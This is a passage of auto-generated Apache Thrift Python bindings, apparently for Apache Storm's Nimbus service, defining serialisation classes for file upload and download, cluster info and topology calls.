if self.ite is not None:
oprot.writeFieldBegin('ite', TType.STRUCT, 2)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileUpload_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileUpload_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileUpload_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileUpload_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class uploadChunk_args:
"""
Attributes:
- location
- chunk
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'location', None, None, ), # 1
(2, TType.STRING, 'chunk', None, None, ), # 2
)
def __init__(self, location=None, chunk=None,):
self.location = location
self.chunk = chunk
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.location = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.chunk = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('uploadChunk_args')
if self.location is not None:
oprot.writeFieldBegin('location', TType.STRING, 1)
oprot.writeString(self.location)
oprot.writeFieldEnd()
if self.chunk is not None:
oprot.writeFieldBegin('chunk', TType.STRING, 2)
oprot.writeString(self.chunk)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class uploadChunk_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('uploadChunk_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class finishFileUpload_args:
"""
Attributes:
- location
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'location', None, None, ), # 1
)
def __init__(self, location=None,):
self.location = location
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.location = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('finishFileUpload_args')
if self.location is not None:
oprot.writeFieldBegin('location', TType.STRING, 1)
oprot.writeString(self.location)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class finishFileUpload_result:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('finishFileUpload_result')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileDownload_args:
"""
Attributes:
- file
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'file', None, None, ), # 1
)
def __init__(self, file=None,):
self.file = file
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.file = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileDownload_args')
if self.file is not None:
oprot.writeFieldBegin('file', TType.STRING, 1)
oprot.writeString(self.file)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileDownload_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileDownload_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class downloadChunk_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('downloadChunk_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class downloadChunk_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('downloadChunk_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getNimbusConf_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getNimbusConf_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getNimbusConf_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getNimbusConf_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getClusterInfo_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getClusterInfo_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getClusterInfo_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (ClusterSummary, ClusterSummary.thrift_spec), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = ClusterSummary()
self.success.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getClusterInfo_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyInfo_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyInfo_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyInfo_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (TopologyInfo, TopologyInfo.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = TopologyInfo()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyInfo_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyConf_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyConf_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopologyConf_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopologyConf_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopology_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.id = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopology_args')
if self.id is not None:
oprot.writeFieldBegin('id', TType.STRING, 1)
oprot.writeString(self.id)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getTopology_result:
"""
Attributes:
- success
- e
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (StormTopology, StormTopology.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, e=None,):
self.success = success
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = StormTopology()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getTopology_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getUserTopology_args:
"""
Attributes:
- id
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'id', None, None, ), # 1
)
def __init__(self, id=None,):
self.id = id
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
